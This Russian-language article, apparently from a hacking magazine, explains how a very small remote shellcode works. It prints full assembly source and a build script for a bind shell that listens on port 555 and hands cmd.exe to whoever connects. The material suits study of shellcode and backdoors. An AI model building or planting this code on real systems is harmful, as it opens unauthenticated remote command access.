- Это дело обещает много любопытного и необычайного
Шерлок Холмс

 

В этой статье мы рассмотрим один из наиболее перспективных методов написания
крайне маленьких RAT (Remote Administration Tool). По сути своей эти утилиты
сродни оружию, которое используют хакеры - они считаются троянскими конями.
Когда же их используют администраторы - это утилиты удалённого администрирования.
Часто из самых оптимальных по структуре и размеру кода
RAT создаются так называемые шеллкоды (shellcode).
Шеллкод - блок программного кода, на который передаётся
управление при эксплуатации ошибок на переполнение буфера.

Несколько месяцев тому назад мне попался один эксплоит, в котором был
очень маленький шеллкод. Меня заинтересовало устройство данного
шеллкода, так как до этого я не видел таких маленьких удалённых шеллкодов.
Удалённый шеллкод отличается от локального тем, что он слушает определённый
IP порт и когда к этому порту присоединяешься, то порождается консоль.
Локальный же шеллкод порождает консоль локально, в Windows NT системах это
"cmd.exe".

Ну так вот, я решил исследовать данный шеллкод. Вначале шеллкод
расшифровывается - это необходимо из-за требований к нему предъявляемых (обычно
необходимо отсутствие нулевого - "\x00" байта). После этого в шеллкоде для его
универсальности идёт поиск адресов "kernel32.dll" и необходимых подпрограмм.
Далее загружаются нужные для функционирования шеллкода библиотеки, в нашем
случае это библиотека "ws2_32.dll". После всей подготовки начинается основной код. На нём мы и остановимся,
чтобы понять и вникнуть в его функционирование.
Сейчас мы рассмотрим исходный код, который был получен мной в отладчике и
преобразован в RAT.

;---[rat.asm]---;
; ;
;----------------;
; ВОЗМОЖНОСТИ: ;
; ;
; (+) Слушает 555 порт (возможно построение шеллкода) ;
; ;
;----------------;

.386p
.model flat,stdcall

callx macro x ;
extrn x:proc ;
Макрос для упрощения
call x ;
использования WIN API
endm ;

;----------------;

.data

wsadata1 db 400 dup (0) ;
;

sin db 16 dup(0) ;
Данные 
handle_ dd 0 ;
mhandle2 dd 0 ;

;----------------;

.code

start: 

push offset wsadata1 ;
push 0101h ;
Проводим инициализацию
callx WSAStartup ;

mov word ptr[sin],2 ;
push 555 ;
Устанавливаем номер 
callx htons ;
TCP/IP порта
mov word ptr[sin+2],ax ;

push 0 ;
push 0 ;
push 0 ;
push 0 ;
push 1 ;
push 2 ;
Создаём сокет
callx WSASocketA ;

mov ebx,eax ; Сохраняем его хэндл 

push 16 ;
push offset sin ;
push ebx ;
Биндим сокет
callx bind ;

push 0 ;
push ebx ;
callx listen ;
Слушаем сокет

push 0 ;
push ecx ;
push ebx ; 
callx accept ;
Принимаем соединение

mov handle_,eax ; Сохраняем хэндл

push 00000004h ;
push 00001000h ;
push 400 ;
push 0h ;
callx VirtualAlloc ;
Выделяем 400 байт памяти
mov mhandle2,eax ;
И сохраняем хэндл
;----------------;
mov edx,handle_

mov byte ptr[eax+10h],044h ;
inc byte ptr[eax+3dh] ;
Заполняем структуру
mov dword ptr[eax+48h],edx ;
STARTUP_INFO
mov dword ptr[eax+4ch],edx ;
mov dword ptr[eax+50h],edx ;
mov [eax+54h],646d63h ;

mov eax,mhandle2 ; Кладём в eax хэндл

push eax ; ProcessInfo => NULL
add eax,10h ;
push eax ;
StartupInfo (!)
xor ecx,ecx ;
push ecx ;
CurrentDir => NULL
push ecx ;
Environment => NULL
push ecx ;
CreationFlags => 0
push 1 ;
InheritHandles = TRUE (!!)
push ecx ;
ThreadSecurity => NULL
push ecx ;
ProcessSecurity => NULL
add eax,44h ;
push eax ;
CommandLine
push 0 ;
ApplicationName = NULL
callx CreateProcessA ;
Порождаем
"cmd.exe"

push -1 ;
push dword ptr[mhandle2] ;
Ждём до бесконечности
callx WaitForSingleObject ;

;----------------;
push 00004000h ;
push 400 ;
push mhandle2 ;
callx VirtualFree ;
Освобождаем память

push 0 ;
callx ExitProcess ;
Завершаем процесс
;----------------;
end start
;---[rat.asm]---;

В данной программе, после выделения памяти заполняется какая-то структура
STARTUP_INFO. Чтобы разобраться для чего это делается, мы вначале разберём
функцию CreateProcessA и её параметры.

function CreateProcessA
(
lpApplicationName: PChar;
lpCommandLine: PChar;
lpProcessAttributes, lpThreadAttributes: PSecurityAttributes;
bInheritHandles: BOOL;
dwCreationFlags: DWORD; 
lpEnvironment: Pointer;
lpCurrentDirectory: PChar; 
const lpStartupInfo: TStartupInfo;
var lpProcessInformation: TProcessInformation
): BOOL; stdcall;

Где:

  • LpApplicationName:PChar - название приложения (плюс полный путь к нему);
  • LpCommandLine:PChar - командная строка приложения (все параметры, которые
    передаются приложению через командную строку);
  • LpProcessAttributes, lpThreadAttributes - в нашем случае 0;
  • BInheritHandles:Bool - в нашем случае 1;
  • DwCreationFlags - в нашем случае 0;
  • LpEnvironment:Pointer - указатель на строку, которая содержит переменные окружения, необходимые нашей программе;
  • LpCurrentDirectory:PChar - рабочий каталог нашей программы;
  • LpStartupInfo:TStartupInfo - параметры запуска приложения;
  • LpProcessInformation:TProcessInformation - переменная, в которую помещаются
    все дескрипторы запущенного приложения.

Результат: True - если приложение нормально напустилось, и False - в противном
случае.

Рассмотрим наш вызов данной функции:

;----------------;
.... ....
push eax ;
ProcessInfo => NULL
add eax,10h ;
push eax ;
StartupInfo (!)
xor ecx,ecx ;
push ecx ;
CurrentDir => NULL
push ecx ;
Environment => NULL
push ecx ;
CreationFlags => 0
push 1 ;
InheritHandles = TRUE (!!)
push ecx ;
ThreadSecurity => NULL
push ecx ; ProcessSecurity => NULL
add eax,44h ;
push eax ;
CommandLine
push 0 ;
ApplicationName = NULL
callx CreateProcessA ;
Порождаем
"cmd.exe"

..... .....
;----------------;

Здесь необходимо остановиться на строчке, выделенной восклицательным знаком.
Ага, оказывается что наша структура STARTUP_INFO передаётся параметром функции
CreateProcessA. Теперь я хочу заострить ваше внимание на строчке выделенной
двумя восклицательными знаками. Это параметр InheritHandles и он равен 1.
Это значит, что мы сможем переназначить стандартный ввод и
вывод процесса. Но как это сделать? Рассмотрим формат структуры
STARTUP_INFO. Вот что написано о структуре STARTUP_INFO в MSDN:

typedef struct _STARTUPINFO { // si 
DWORD cb; 
LPTSTR lpReserved; 
LPTSTR lpDesktop; 
LPTSTR lpTitle; 
DWORD dwX; 
DWORD dwY; 
DWORD dwXSize; 
DWORD dwYSize; 
DWORD dwXCountChars; 
DWORD dwYCountChars; 
DWORD dwFillAttribute; 
DWORD dwFlags; 
WORD wShowWindow; 
WORD cbReserved2; 
LPBYTE lpReserved2; 
HANDLE hStdInput; 
HANDLE hStdOutput; 
HANDLE hStdError; 
} STARTUPINFO, *LPSTARTUPINFO; 

Описание структуры STARTUP_INFO и Описание флагов запускаемого процесса

Теперь становится ясно, что при создании процесса программа перенаправляет
свои стандартные потоки ввода и вывода на сокет. Это ей удаётся сделать путём
манипуляций над структурой STARTUP_INFO и установкой флага InheritHandles при
вызове функции CreateProcessA.

И всё таки, как необходимо заполнить структуру STARTUP_INFO?. Структура должна
заполняться стандартно, об этом уже многое написано. Отличия лишь будут
заключаться в заполнении следующих полей:

+ dwFlags - должен быть установлен в STARTF_USESTDHANDLES
+ hStdInput - должен указывать на хэндл полученный от accept
+ hStdOutput - должен указывать на хэндл полученный от accept
+ hStdError - должен указывать на хэндл полученный от accept

Для компиляции данной программы нужно использовать следующий *.bat файл:

@echo off
cls
tasm32 /mx /m4 /zi rat.asm
tlink32 -x -v -V4.0 -Tpe -ap -c rat.obj,,,imp32i.lib ws2_32.lib
del *.obj

В итоге мы получили одну из самых маленьких утилит для удалённого
администрирования. Так же разобралиась в функционировании удалённого шеллкода.

Check Also

Взломы камер Ring привлекли внимание СМИ. Хакеры троллили пользователей в подкасте NulledCast

Хакеры ломают умные камеры Ring и терроризируют их владельцев, транслируя происходящее в п…

Оставить мнение